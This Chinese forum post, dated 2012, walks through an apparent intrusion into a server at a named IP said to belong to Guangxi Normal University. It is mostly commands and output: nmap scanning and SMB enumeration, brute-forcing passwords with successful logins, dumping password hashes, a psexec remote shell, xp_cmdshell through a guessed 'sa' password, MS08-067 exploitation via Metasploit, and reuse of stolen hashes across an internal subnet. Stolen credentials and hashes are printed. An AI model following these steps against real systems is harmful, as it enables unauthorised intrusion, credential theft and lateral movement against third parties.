中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/2 l, d: ~9 C4 s: v9 J- k

% F4 V+ I9 V0 a) Uroot@bt:~# nmap -sS -sV 202.103.242.241  M! \; d; C" F5 M
9 v. r! w- k, i- I! f1 L: c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
; {8 J6 W& Z& ?: n
: o7 D) H: ]0 g9 [Nmap scan report for bogon (202.103.242.241)$ e; J! M6 t) p# m; J- T( s$ V( X, `0 u
- {: m: t9 C; y8 j8 U0 l1 U
Host is up (0.00048s latency).6 y1 V  N# _2 h7 k( L- z) N- W  V

4 N1 G  \4 F2 o) E; d2 D4 mNot shown: 993 closed ports
9 y! e) Q' F0 T8 {7 n( X; i2 S# _, d7 A$ }# {8 i
PORT     STATE SERVICE       VERSION8 b% c- X4 r$ D# c! z$ w1 }3 q6 r) `( S
8 a7 k6 g6 {6 ?! E6 l8 o- H
135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! |& d) b3 z; f2 w( c
7 Q1 o' l! b8 I2 `
139/tcp  open  netbios-ssn6 B2 z' K8 q: E9 s: `- D
  |" j0 k' e$ B& y8 z- \6 i6 v
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
+ w" h% Z! p9 i" ]* Q4 \6 |* M
* G. f+ H" Z+ L1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
7 X2 e( ]+ Q. x; a/ m5 J4 ^2 P4 K$ L, k6 Q/ Y, `; ]
1026/tcp open  msrpc         Microsoft Windows RPC
9 [0 e( z8 P* z
2 Q$ ~/ A0 d! |/ o( M3372/tcp open  msdtc?0 G- ~6 y8 ]! _, L/ i5 L# k" p/ A
; t% j$ }$ J/ ~" p* D( ~/ u( H
3389/tcp open  ms-term-serv?
! u: H9 j% f2 u! T5 |+ F9 l" W( `3 V# ^3 l* H* a! [' \7 D9 ^
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
7 v5 S8 }: M" m+ i1 [/ s8 O! z  VSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
0 p$ F, |* O4 P5 u# S0 X4 f6 u0 i% `4 V: m
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
9 V- ]. h% c9 C  m4 d& S9 R3 e
2 O3 r' F! r# l) D1 Z. S; ~SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
, V& L: O) K3 P% {- a, l; o& X$ j8 e0 x) t) b4 q% d. r+ d
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO& e" u' Q4 h  p) t& T

9 H; Z  ]' u. P# w1 l6 t8 DSF:ptions,6,”hO\n\x000Z”);
* c# H3 W& R& K: T4 H9 {  C/ K( Q  K& q/ e9 u/ T' X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& [  a+ S) O0 f$ u" X0 ?

: }( R) ]# \; N* ^* R0 ^) |$ @Service Info: OS: Windows
2 c3 U7 ~9 _4 i8 _+ _7 p
& o! z+ ~1 w" u, ~" o: x) |8 O8 c& EService detection performed. Please report any incorrect results at http://nmap.org/submit/ .- y* Q( e1 Y6 ?- f

5 h$ E& q3 j" t) G% rNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& @* C: e' s/ x# e
- T$ K9 i+ O3 L5 ]/ F, g. \1 N6 vroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
8 c6 p6 p. H" n% g
8 j' U. w$ Z& s9 H/ W4 l-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse8 n% e7 @! `3 I7 F+ J% T3 J
$ O  r1 N+ ?- Q" M' r. e7 U" X
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse- ~7 S0 H, G7 P' C. W) ]) u

$ I$ e0 E1 c, s-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse) t: `7 \; \' O3 s; A) X

' \+ U5 F6 W: @1 y6 N+ e" S-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
1 a3 Y2 T; c. k: g  B) `
; ?% s# H& b1 P7 n3 L. p# a-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
. Y  }) ^4 H" t, I# F& m3 S6 u2 p; V/ t" f- l, h& E
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
' ?. O. Q& O) [' \: a
9 [+ p' Q4 e% g& y-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse: W; p9 u/ M' {# c

" u$ u6 `* X) G: A* C  O4 U-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse9 S4 l4 B# ~# W, ~9 W

" Z; Q* [& O" v-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
1 W) d6 R3 G, q# W# K9 c; a
+ y- T  w  J! z-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse9 V& L$ I( t( k* P/ i5 H3 f$ _
4 S' f- I: w# P, p0 @
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
( b, b% h0 g9 s. W, R5 C
# t! k' H9 C4 J- ~( _4 n-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
# |) }/ D$ _3 s1 N) f4 K! g1 z1 _. D, b8 a: \- h* V5 [; ]* ~  \
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse/ L1 u$ l) u& z$ E# x  e

0 v+ V6 U2 v6 L3 Y; Z1 d-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse! r8 K/ U3 o; G0 [. g; D! J7 u
7 m7 b8 E; P& n1 |3 d' q
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
+ X. L5 Y# W1 V- h$ Q5 s$ t
. y- ]0 n8 V" b6 }$ Q# \4 Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   8 t- w% G) A$ h. p; I+ ]

6 f/ M& x2 @" ]- f! \4 n, Z//此乃使用脚本扫描远程机器所存在的账户名# ]6 {, t' k( E( ?; H
: }  @9 @/ x! N$ `: [( U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST) F- Z/ B! l# C/ d/ X$ i

, L5 d' a$ P) n* j( E0 a3 yNmap scan report for bogon (202.103.242.241)9 K0 W* Q0 S! x
+ C. R) `0 a1 @5 F: s
Host is up (0.00038s latency).
5 x, S8 D: T8 A% X' s: W' |, l  I/ i9 o2 f
Not shown: 993 closed ports
  g3 F$ v& y7 B: k) t
0 g0 |, @1 F( K/ JPORT     STATE SERVICE
3 Q2 X8 v$ ^  b4 K. t! R7 d6 {! U1 U$ c* V
135/tcp  open  msrpc
% ]0 d% I, w% G' g/ F0 i' q' a- g8 y/ t1 m: T
139/tcp  open  netbios-ssn
+ ]$ P/ w" Y8 F$ @0 S
  E4 a, f% T! L7 a+ E3 q445/tcp  open  microsoft-ds0 @8 u, g  M0 H* y, R" y

( T* `2 T  D' t3 x' U1025/tcp open  NFS-or-IIS. n! ^0 u/ M& a. t( N
. `( a6 ?; {+ c, G3 L
1026/tcp open  LSA-or-nterm
. Y2 ~+ g9 _: b8 ~! E2 x$ O! ?; v# Z( e& H% s
3372/tcp open  msdtc
  b3 ^- ]( y3 K6 R/ ^. b7 y; ~' m9 w" ?
7 K5 {( ~$ v8 E; F2 t5 H( y3389/tcp open  ms-term-serv
. m3 h3 l+ j$ X! ?2 b, z8 v) @7 L/ q% B7 E: Y  ?% i: D; P) u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 L2 e; J, ^2 z4 ^9 f6 E
5 Y0 y+ B+ i% V
Host script results:
0 Y. G+ f" h8 M( F$ w) Q( u
! T2 k" p+ j; m5 b1 N; Z# u, a| smb-enum-users:% c+ X& q' T+ W/ ]6 C
6 u5 R* I1 u" O: q" ?, H0 ~
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果* Y; m: M7 W1 m2 |

$ a# [- h) ~8 X6 |7 bNmap done: 1 IP address (1 host up) scanned in 1.09 seconds6 G$ H0 E- @, `

5 ]# _9 w0 Y$ d+ m+ E: Xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ) Y1 X. o: k* S$ C. c# X" ?

* ]6 j* A8 M- S  P2 p//查看共享
& e& b) N' Z, k. p- V6 C% q
2 ]; r0 q3 y2 f8 i& MStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
4 S4 K6 I5 P6 h5 i# s# I- Q' n$ z
, d2 s5 _7 ~/ G2 YNmap scan report for bogon (202.103.242.241)
. _; ^* }0 Q/ \6 x! ]
  K% ]- e, C4 V9 Y, _1 J0 A4 r. P3 EHost is up (0.00035s latency).
8 E; S! K7 \) T( Y0 S
' X3 L4 U$ w2 wNot shown: 993 closed ports! X' A8 N3 [" M

4 C, U. D- @3 h5 T2 IPORT     STATE SERVICE
9 D) x* L4 H9 Z. o. o# Z8 @* i* Y9 ~+ I
135/tcp  open  msrpc
9 V# N" X) }8 e2 U0 O& ]0 r' b7 E2 l3 W9 g0 V5 c+ h" l8 z8 [
139/tcp  open  netbios-ssn) K4 v9 k* t, T4 n/ E

- u4 [* ^5 f" T1 r+ y445/tcp  open  microsoft-ds' K1 n# q8 G" N# X- p5 ^* P
: y# o- S5 ?9 _! n& D
1025/tcp open  NFS-or-IIS
$ C- Y7 c% n+ q) W' o
) }" `# Z: y+ J, Q7 x1026/tcp open  LSA-or-nterm5 _) z4 @$ G" A* `/ J8 B/ l4 ?

0 R* I& q  i2 _0 u: k3 Y" a3372/tcp open  msdtc
9 e% M& |4 L* ]3 f& G; M9 T) k# j# z( u4 O# u1 f$ m: k
3389/tcp open  ms-term-serv
, W$ g) x3 Z+ z# Q; E- }0 q1 T$ \& @  K, C2 i! h
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ c0 u4 o$ L- c) p, p

4 |2 U2 C: |( F2 XHost script results:+ P& }% M1 ~1 X1 M4 G
* n. W, p1 d) T5 _- F4 w' S
| smb-enum-shares:
3 a) E) \0 @8 R5 u+ Y6 I8 `- \9 o# o; P) C5 J
|   ADMIN$5 ^5 K. q% S$ V* P' c! I* S
1 a6 _3 u  m; R' `; S
|     Anonymous access: <none>5 n3 N) e/ z. t6 w& c
. m; a, L2 A0 u6 b1 E( c
|   C$
( I2 v9 ]- I" p% Y2 M8 N
) w7 z- i/ ~+ X& d* `* X9 e|     Anonymous access: <none>; P  {: a; G. m2 U1 H5 m7 k

3 E$ P7 k/ U5 c% k& c|   IPC$
4 n9 F/ R( Z% f/ Y9 C5 {3 G4 \
; Y1 e0 O# X6 L) ]" [2 U1 b|_    Anonymous access: READ/ F8 B6 c# s6 _/ H
+ D& i) K( O$ A
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
7 e9 ]/ q4 I# d; J
# ^' X0 h8 g( d  I/ l0 |# \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
% K  A! H! E8 J, o/ x- ?
) G( o, N/ V0 u7 ]- v4 W( h" m5 I9 k//获取用户密码; o$ I, A4 X* t; m
* Q" q. k8 m- ], w' U# M% N, d- x0 |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST/ P" A) ^" U6 K1 v$ w3 b7 D8 w5 F" \8 I
6 w4 T0 U. G3 g9 D: y; R/ S0 d
Nmap scan report for bogon (202.103.242.2418)
) h+ R+ j, x, `- m% w: R( p
6 w' ~' a7 E# e+ M0 v* y4 x: ?Host is up (0.00041s latency).% d% h3 T) Q9 r0 b
9 J8 w. \7 g. \# v: t6 x/ m
Not shown: 993 closed ports* l) c; F9 K$ T

7 _' ?$ X: P9 u+ @/ r  s0 IPORT     STATE SERVICE0 x( p+ L# C5 B% w9 y

! N" s# f" y  T; F/ Q8 q% K) q- |. U135/tcp  open  msrpc
8 e. Y9 W, b  \  `
3 R3 V6 K# J( \) k: |139/tcp  open  netbios-ssn# Z# m0 ^" _8 Q8 G
3 V% ~9 s: P$ l1 w- @9 r$ k
445/tcp  open  microsoft-ds
( ?6 L" K0 g' C* L$ J
; }9 z8 w1 D! C1025/tcp open  NFS-or-IIS
* B+ {6 V, I4 V  ]/ H7 c6 v8 x7 e
, a3 {8 Q" C4 j0 w1026/tcp open  LSA-or-nterm' M- V" K& P; s, Z! `9 t4 B
+ C6 J$ k: D9 [
3372/tcp open  msdtc
  p' D2 V' ]. }0 A* A' @. v
! q  g& o, g- Y6 y3 C2 q+ S3389/tcp open  ms-term-serv
/ i* |- b$ g" f' b; n8 f& s+ l( C: C! J" E: p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 b: ^, ?% ~, L1 i: l
0 T, {" o. G5 \7 l, WHost script results:
$ W% ^) I: C( ?8 j- t8 v8 f  F/ j" b. x
| smb-brute:
" |" [$ ?8 h# N, o( k
% J$ O) N' \7 H: g# \" D# `- Padministrator:<blank> => Login was successful7 N2 B4 Z% `/ X, D8 K" B4 Z
  s' f4 P  }" ~% {& J* i# k
|_  test:123456 => Login was successful
* @: F; D9 |- r; _8 n1 @2 b3 |3 s; q- H6 |. Q( b* z
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds1 u( _8 M* u$ B: q* L

2 [6 M  u# t: H, w+ G( R) F5 aroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash+ k0 j: Y) ?3 [: `0 p# ^

7 M5 K+ R' c% Aroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data% U4 a- H+ i9 _" e' W; a
6 K5 E5 d7 ?; H, j$ h
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
6 [' S( N' w+ \; j+ B' B, f' ]- t3 |+ h/ i! Y9 Z
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
1 S) T+ S2 F6 s- ~5 o! i, ?9 Y
; ^2 ?8 U. I6 s0 \* fStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST1 Y4 Y+ t0 e( D0 p& f) i9 @% j
. E( s0 {) D  v9 D# @# ~/ T
Nmap scan report for bogon (202.103.242.241)+ e' n+ D3 \7 j/ A" ]4 a7 I
! c" |5 B2 n* N: J$ `6 x) B) I# z8 a
Host is up (0.0012s latency).
& q. Y- ^  s- G" E6 u) \* ]
  P/ k# y' N  l6 WPORT    STATE SERVICE- Z+ ^, ~" I* c' h5 f9 t- j
9 a3 \" U  s% k- i
135/tcp open  msrpc, T( C0 F0 i- S% F) b% U
# v3 p8 v9 E- t. j' h% y
139/tcp open  netbios-ssn
6 @# n' s6 T6 e
$ n* Z7 I7 A) R9 b" O445/tcp open  microsoft-ds, a( S' I9 e  P, D' S. k
- |& o# k' j/ S9 U. G; |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 g6 Y2 M$ s- i/ q" k4 i! G# c1 p. Y* j
Host script results:+ h( L" r/ n, J) M8 {; t

) B% B/ X! P: K! F| smb-pwdump:6 H- o0 o2 I3 V/ L0 _

1 E. Y4 q6 T) D& E' R| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
4 S8 w' `5 Y+ L4 l4 b
, W- L5 y2 d# K. V. ?0 W5 x| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
, Z) O3 Q% @2 O5 `  O, D0 y4 Z7 w& Y& z7 f& H
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
8 a" Z7 |9 T/ z: z$ o" c3 t) H! ~. @4 M& K$ d, Y0 I
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2- \+ q% _+ Q2 r5 F& u

8 B6 C/ X/ n% R( jNmap done: 1 IP address (1 host up) scanned in 1.85 seconds( s1 E6 S9 X) Y9 H2 m/ ~

3 ~; z6 g# j8 y, n) R: S" J) GC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
  L7 Z5 o% _1 l; T* {0 l# J6 H
/ ?  ]# v1 v1 N# @6 p1 X-p 123456 -e cmd.exe3 Z; x, F1 u& {8 K  `9 ]6 P/ ?0 `

' F- H( T% a+ ]# t. ^PsExec v1.55 – Execute processes remotely
' V0 E, k( R" r% a& e) K
3 f: S0 h) H) r) {/ v7 LCopyright (C) 2001-2004 Mark Russinovich
1 j- s, t8 r* u& g  t& ]7 w& k& M  U' m+ q$ `
Sysinternals – www.sysinternals.com
. z" _& [- y& t" y5 a
: `3 V& H4 E( c, [7 T- hMicrosoft Windows 2000 [Version 5.00.2195]+ l( Y& N% w! g: A

) h2 S  F5 D! q, E+ k* |# T9 w(C) 版权所有 1985-2000 Microsoft Corp.* S5 D( N0 O# K! @
) v, A, Y' V' Z8 v3 w$ R8 C( w
C:\WINNT\system32>ipconfig
- M, U8 d/ Y* Y( A% V3 u- I2 d; {7 u; Y% f) q
Windows 2000 IP Configuration2 ]7 A7 V  o% L: h; ?( Y% I! l& X

  S! k: ]+ h7 C9 fEthernet adapter 本地连接:
6 d: _; U4 a( B9 s& A
% {8 m+ J7 U; T3 KConnection-specific DNS Suffix  . :
* h$ o7 q. P4 y, q5 U5 M6 P
( M- q  {5 @4 d# GIP Address. . . . . . . . . . . . : 202.103.242.241' }; B/ @" M" a3 q
0 H& [. J5 t6 M; y/ l1 p4 b
Subnet Mask . . . . . . . . . . . : 255.255.255.0
, D0 N% K: G" y0 W9 C' |6 l8 E
5 P3 |4 O+ G# M/ ^7 H( uDefault Gateway . . . . . . . . . : 202.103.1.1
3 t) V' r, G* z3 E  e5 S$ t( ]1 N
; Q* e6 ^- H! n; i( i; Q% F. z% q' dC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
( T) x, |9 P9 r; d/ B, L8 Z4 \* j
4 L1 J6 v  W- l7 V! C. Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
  N" X" z% T8 S9 V+ y$ G3 r' @- S/ c# j: T
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
/ d+ J0 `- l/ u6 `6 N) k) s  r: X  q; [: Q- p. F, W3 ^
Nmap scan report for bogon (202.103.242.241)  l- n" v! C6 L- }

, g- J9 @+ r: z* ]' L. y! M" lHost is up (0.00046s latency).
5 V& \1 d0 ~4 @. Q( a* p( @/ A7 \- l3 q+ @& B! j
Not shown: 993 closed ports' R& e" C  c2 y; f
% v' i% t) ^6 p5 @+ A3 ?3 G9 u
PORT     STATE SERVICE
" j6 R7 }+ z, B. u2 ?- E; E% S" }( G7 j) p4 v" U2 z# R0 i- n
135/tcp  open  msrpc
! g- m5 i; e2 V' F+ o* s& x
) g* f% s6 @: G. Z$ N" J139/tcp  open  netbios-ssn& t" V! d- U3 e3 L
/ p3 ^2 M. {  E7 ^/ `
445/tcp  open  microsoft-ds) C8 U0 Y4 n! P, h" }
2 r! ~6 \% ?0 m7 U
1025/tcp open  NFS-or-IIS. }% d/ ~2 J7 S

. t4 J5 `/ ~& L' M' n4 H% r1026/tcp open  LSA-or-nterm
/ g7 c) @  D& q6 h
* w. u; R. l7 K+ _$ C+ f3372/tcp open  msdtc+ `5 ]7 _6 F% r

9 c7 {6 L1 l; X& }3389/tcp open  ms-term-serv
# Z" s* v- ^  ]4 ^3 w. K9 c
" O- z( G$ J' v1 {MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 o5 m( |4 b- v) s8 y& k
3 j2 |& J7 D  h" l/ T: e
Host script results:; Z2 ~( \8 n5 ]4 S0 h

! O2 b9 y8 x; t| smb-check-vulns:' H7 v- \0 g( T4 R/ |' O
. [& \& q' F$ H4 m
|_  MS08-067: VULNERABLE
% {, p4 J1 T$ f. \6 S; T& r) w2 d$ p! p* ~3 a: h1 V
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds% I" K# F1 T$ T3 l3 P- M
: Q6 l2 }/ U9 H$ @
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出7 n* X. @4 }" l  O% ~8 K
4 F2 e" c: S) N" }. `
msf > search ms08
# i; \' r9 {! V2 M7 K
% R& P( R) a6 w: I1 O2 ]8 Hmsf > use exploit/windows/smb/ms08_067_netapi3 |; k2 ]5 r% \( h& D9 F: \* D7 J

& Y& d. ]: `. _8 U" M2 I5 Dmsf  exploit(ms08_067_netapi) > show options
& b( ?+ {6 _8 |: P/ z. [7 _3 v! i" I2 H* C4 Z/ t; Y5 m5 F: H- ]
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ j. r3 N; Y6 L' k: z. _) I- b1 Z8 I- V0 w- |
msf  exploit(ms08_067_netapi) > show payloads2 C' w) `$ H  Q

% ~. P$ @1 ?1 h6 K0 J1 e2 amsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp( C  J# a# W+ S. Y/ \) F

. Z3 ]4 g+ S8 T; w: z; O, g4 \msf  exploit(ms08_067_netapi) > exploit
- E  X2 o) t6 D# c& ~, b! N  j/ T' N) [/ j! P
meterpreter >
6 o& c  F  ]$ m! t
$ H3 T$ h. p$ cBackground session 2? [y/N]  (ctrl+z)
8 T# K; I0 i# `0 A' `( G3 D. R* g
2 F; _4 \7 B( g; R: N( Q" omsf  exploit(ms08_067_netapi) > sessions -l
4 ~0 U8 n; ?$ O2 `) \1 s% L0 \
( e& b% A$ U8 M9 Broot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
  ], t2 F4 D: ?6 r7 b: k" {$ ?' x
7 W3 v0 u* v+ h3 U' stest
5 Q+ j4 s% y' m( B
( ^% \) Q; H9 S) I4 w3 s  Yadministrator. Q! C' a$ `# |# M

9 j+ B/ \1 n: s% z2 }& l; V! s5 d' Kroot@bt:/usr/local/share/nmap/scripts# vim password.txt# [5 N' X- P7 u3 O5 n. a3 O

2 N3 w8 S2 d! ?: C, }- l/ e44EFCE164AB921CAAAD3B435B51404EE
, g% ~$ k1 Q! N2 |# }5 j
; p/ e" _% e! p4 A  r7 ?/ X1 X! vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ! g* w  X( D; A; w

* U- }( I! R6 b //利用用户名跟获取的hash尝试对整段内网进行登录6 r* Y2 O0 q* q) _9 X7 p6 L+ v, ]
2 m% S' p- Y9 A& V
Nmap scan report for 192.168.1.105. z$ m% O% k( Q) _5 Q
1 ]" r3 s" |( M' c- c6 p: A* D
Host is up (0.00088s latency)." {. W9 V( f7 S% j9 Z+ ]

# n, \/ w) b* [, Z2 |& Y. T& N0 hNot shown: 993 closed ports
  Y2 e( E) m% r& N$ F  d, R4 V/ s
PORT     STATE SERVICE4 o2 y1 P1 l, ?" t

/ p. J- i, v: P3 a/ J2 J/ g- o, D: E135/tcp  open  msrpc- Z/ [/ T+ {* s

: H+ t8 c( k0 S139/tcp  open  netbios-ssn1 D$ q3 O5 D. X# I! ~! x
2 E" Z8 d+ ]" \9 r7 p3 r" C9 ~
445/tcp  open  microsoft-ds0 N5 F  ]9 W' G" U- S# @: a! q
# K- }" f0 l8 Z( e0 Y, k  B. Z1 Z
1025/tcp open  NFS-or-IIS
* l# [9 Y" p! l. o0 Y8 p
- w7 |; s% N% [7 M, k# z1026/tcp open  LSA-or-nterm
$ _. d) R7 F8 ]. G3 i9 i9 _$ D( U8 d8 K* b, K3 _
3372/tcp open  msdtc6 V* ^' f1 ~% C4 {. Y4 G$ P; ^7 Q
* G5 U* \& x# `  m! L  N, u+ F
3389/tcp open  ms-term-serv
8 `; m: n4 `3 X  ]: J5 `9 w; x0 k* h/ d. A
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 e8 n. h( R* Z2 Z( i& _
  U5 A  e* M$ ]+ e* u% NHost script results:
! v2 p9 ~/ L5 F% W
+ `/ a! t" j4 o& F0 l( N" x/ w| smb-brute:" G  T) e3 E% ]" n
3 n% O3 w5 ?; T8 d' R% e
|_  administrator:<blank> => Login was successful' J2 j1 }" s' M

+ J1 w1 A" h3 E* C" i攻击成功,一个简单的msf+nmap攻击~~·
& X# i1 G9 x$ q, ^- j! s0 F
8 O* j* S, E4 j, ?6 N5 V



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2